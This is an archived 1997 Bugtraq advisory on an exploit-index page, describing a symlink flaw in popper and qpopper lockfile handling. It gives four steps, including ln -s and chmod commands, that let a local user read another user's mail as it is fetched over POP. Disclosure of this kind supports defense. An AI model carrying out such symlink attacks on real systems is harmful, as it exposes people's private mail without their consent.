Popper and qpopper symlink hole
| Description: | qpopper and popper use an insecure lockfile creation mechanism that allows you to read other people's mail. |
| Author: | dynamo@IME.NET |
| Compromise: | Read other people's mail when they fetch it via pop. |
| Vulnerable Systems: | Those running vulnerable versions of popper and qpopper. Probably those below version 2.2 |
| Date: | 7 August 1997 |
Date: Thu, 7 Aug 1997 21:04:47 -0400
From: dynamo@IME.NET
To: BUGTRAQ@NETSPACE.ORG
Subject: popper and qpopper let you read email from other pop clients
when i found this, i checked the archive to see if anyone else had found
this, and it didnt look like it.. if its a repost of ideas, sorry.
Some versions of popper and qpopper from qualcomm allow you to read
other peoples email. There are quite a few situations in which you
need your mail spool directory chmodded 1777. If you have local users
on a machine with the mail spool directory, they can create symbolic
links from the temporary pop drop box to a file that they can read.
See if youre vulnerable:
1) touch /tmp/lumpy; chmod 777 /tmp/lumpy
2) ln -s /tmp/lumpy /var/mail/.luser.pop
3) wait for them to check their email.
4) while they are reading it from the pop
server, look at the file in the tmp dir.
Apparently it is fixed in the newest version.
dynamo
The master index of all exploits is available
here (Very large file)
Or you can pick your favorite operating system:
This page is part of Fyodor's exploit
world.
For a free program to automate scanning your network for vulnerable
hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resources:
